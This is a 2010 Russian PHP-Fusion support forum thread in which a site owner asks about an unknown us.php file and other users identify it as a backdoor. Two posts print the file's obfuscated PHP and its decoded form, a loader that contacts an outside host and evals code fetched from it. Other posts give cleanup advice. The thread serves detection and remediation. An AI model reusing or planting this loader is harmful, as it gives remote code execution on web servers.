PHP-Fusion Russian Support Site
 NETCK.RU - Сетевое сообщество : Клуб вебмастеров
Главная · Форумы · Статьи · Каталог ссылок · Mod&Plugins
Support php-Fusion RU
Официальный сайт поддержки русских пользователей
Скачать последнюю версию php-fusion
Скачать
Навигация
Главная
Форумы
Статьи
Каталог ссылок
Файлы
Photo

F.A.Q.
Контакты
Поиск


Support Sites
Карта сайта
Последние статьи
ТИЦ и ВИЦ Яндекc
Общие принципы рабoт...
Шаблоны для цифровой...
SEO оптимизация и пр...
Интернет зависимость
Наши спонсоры
Последние ссылки
SiNG cms
  SiNG cms - свободная...

My-Torrent.Net
  Открытый торрент-трекер

каталог сайтов Самары
  В нашем каталоге раз...

Бесплатные шаблоны д...
  Качественные ВЕКТОРН...

Сервис регистрации к...
  Оригинальный каталог...

Сейчас на сайте
Гостей: 2

Пользователей: 0

Всего пользователей: 1,723
Новый пользователь: Reel
Счетчики

Рейтинг Mail.ru

RSS новости
Просмотр темы
 Распечатать тему
Кто знает, что за файл...
Aehr
#1 Распечатать сообщение
Опубликовано 11-06-2010 19:31
Пользователь

Сообщений: 32
Зарегистрирован: 26.09.08

Уважаемые Знающие!

Кто знает, что за файл us.php в корне? Поиском по сайту и в Инете ничего не нашел.
 
Olegat
#2 Распечатать сообщение
Опубликовано 11-06-2010 19:40
Аватар пользователя

Пользователь

Сообщений: 473
Зарегистрирован: 01.02.06

У меня такого нет.
А что в файле написанно?
 
http://x-vim.info/forum-volgograd.php
Aehr
#3 Распечатать сообщение
Опубликовано 11-06-2010 19:58
Пользователь

Сообщений: 32
Зарегистрирован: 26.09.08

Одна длинная не читаемая строка.

Как ее правильно в сообщение вставить - как цитату?
 
Aehr
#4 Распечатать сообщение
Опубликовано 11-06-2010 20:32
Пользователь

Сообщений: 32
Зарегистрирован: 26.09.08

В файле вот это:

Загрузить источник  Код
<?php

eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ2NoYXJrYSddKSkgew0KICAgICRzb2NrID0gQGZzb2Nrb3Blbigna20zMjAyNS5rZXltYWNoaW5lLmRlJywgODApOw0KICAgIGlmKCRzb2NrKXsNCiAgICBmd3JpdGUgKCRzb2NrLCAnR0VUIGh0dHA6Ly9rbTMyMDI1LmtleW1hY2hpbmUuZGUva29sb2JvazQvaW5kZXgucGhwP2hvc3Q9Jy4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4nJmNoYXJrYT0nLiRfR0VUWydjaGFya2EnXS4nIEhUVFAvMS4wJy4iXHJcbiIpOw0KICAgIGZ3cml0ZSAoJHNvY2ssICdIb3N0OiBrbTMyMDI1LmtleW1hY2hpbmUuZGUnLiJcclxuXHJcbiIpOw0KICAgIHdoaWxlKCRjb250ZW50W10gPSBmZ2V0cyAoJHNvY2spKTsNCiAgICAkY29udGVudCA9IGltcGxvZGUoJycsICRjb250ZW50KTsNCiAgICBAZXZhbCh0cmltKHN1YnN0cigkY29udGVudCwgc3RycG9zKCRjb250ZW50LCAiXHJcblxyXG4iKSkpKTsNCiAgICBmY2xvc2UgKCRzb2NrKTsgZXhpdDt9fQ=='));

?>



 
Alipapa
#5 Распечатать сообщение
Опубликовано 11-06-2010 21:29
Аватар пользователя

Пользователь

Сообщений: 181
Зарегистрирован: 25.05.08

Загрузить источник  PHP
  1. <?php
  2. if(isset($_GET['charka'])) {
  3. $sock = @fsockopen('km32025.keymachine.de', 80);
  4.     if($sock){
  5.     fwrite ($sock, 'GET http://km32025.keymachine.de/kolobok4/index.php?host='.$_SERVER['SERVER_NAME'].'&charka='.$_GET['charka'].' HTTP/1.0'."\r\n");
  6.     fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock));
  7.     $content = implode('', $content);
  8.     @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
  9.     fclose ($sock); exit;
  10.     }
  11. }
  12. ?>

Вот так оно расшифровывается. А проще - вас взломали и уже знают логин и пароль к вашей базе. И могут делать с вашим сайтом всё.
Изменил(а) Alipapa, 11-06-2010 21:42
 
http://alipapa.com.ua/
Alipapa
#6 Распечатать сообщение
Опубликовано 11-06-2010 21:36
Аватар пользователя

Пользователь

Сообщений: 181
Зарегистрирован: 25.05.08

Файл срочно удалить. Проверить, нет ли еще левых файлов. .htaccess проверить не забудьте.
Изменил(а) Alipapa, 11-06-2010 21:44
 
http://alipapa.com.ua/
Aehr
#7 Распечатать сообщение
Опубликовано 11-06-2010 21:46
Пользователь

Сообщений: 32
Зарегистрирован: 26.09.08

Спасибо!
Раньше файлы с "левыми" кодами искал по дате. А в этот раз свежих дат нет. Где искать ломаные файлы не знаю.

Перезалить файлы с дистрибутива? А моды и плагины как себя поведут?

Не знаете, почему антивирус ничего не находит в домашней директории, которую я скачал на локальный компьютер?
 
admin
#8 Распечатать сообщение
Опубликовано 12-06-2010 06:10
Аватар пользователя

Супер Администратор

Сообщений: 4424
Зарегистрирован: 05.11.04

Искать надо везде. И в infusions и в images и forum/attachments

На локальном компе антивирус не находит ничего, потому что шелл подгружает вирус из инета иногда. Искать надо причину заражения. Это могут быть левые файлы (щелл), или просто узнали ваши пароли. Проверьте базу данных на присутствие явакода, обычно он в таблице юзеров.

Если ничего не получается, то тогда радикальное лечение - все удалить, залить чистый дистрибут и проверять хостинг с нуля.
Какой вопрос - такой ответ!
 
http://netck.ru
Aehr
#9 Распечатать сообщение
Опубликовано 12-06-2010 08:02
Пользователь

Сообщений: 32
Зарегистрирован: 26.09.08

Спасибо, начну искать.
Только вот не знаю как посмотреть наличие явакода в базе данных. В каком поле это может быть?
 
admin
#10 Распечатать сообщение
Опубликовано 13-06-2010 08:55
Аватар пользователя

Супер Администратор

Сообщений: 4424
Зарегистрирован: 05.11.04

Бэкапишь базу на комп, открываешь блокнотом и смотришь таблицу user
Какой вопрос - такой ответ!
 
http://netck.ru
Olegat
#11 Распечатать сообщение
Опубликовано 13-06-2010 18:34
Аватар пользователя

Пользователь

Сообщений: 473
Зарегистрирован: 01.02.06

Aehr написал:
Спасибо, начну искать.
Только вот не знаю как посмотреть наличие явакода в базе данных. В каком поле это может быть?


Его сразу будет видно, по нетипичности построения запроса...
 
http://x-vim.info/forum-volgograd.php
Перейти на форум:
Авторизация
Логин

Пароль



Вы не зарегистрированы?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Голосование
Как вам новый релиз Фьюжина?







Вы должны авторизироваться, чтобы голосовать.
Fusion7
cms php-fusion 7
Мини-чат
Вы должны авторизироваться, чтобы добавить сообщение.

08.09.10 18:54
Privet Vsem!!!

03.09.10 07:40
m_a_f, да ты поэт Smile

03.09.10 07:04
ух, как все грустно

03.09.10 03:37
:-) Осень настала, холодно стало, сайты бабло перестали давать..

31.08.10 07:29
Всегда пожалуйста!

26.08.10 19:13
Спасибо! Pfft

26.08.10 17:08
сделано

26.08.10 14:29
активируйте меня на сайте седьмой версии пожалуйста!

16.08.10 08:17
Скоро осень, за окнами август...

07.08.10 09:26
Все еще актуален))))

Наша кнопка
Будем благодарны, за размещение нашей кнопки или ссылки на наш портал.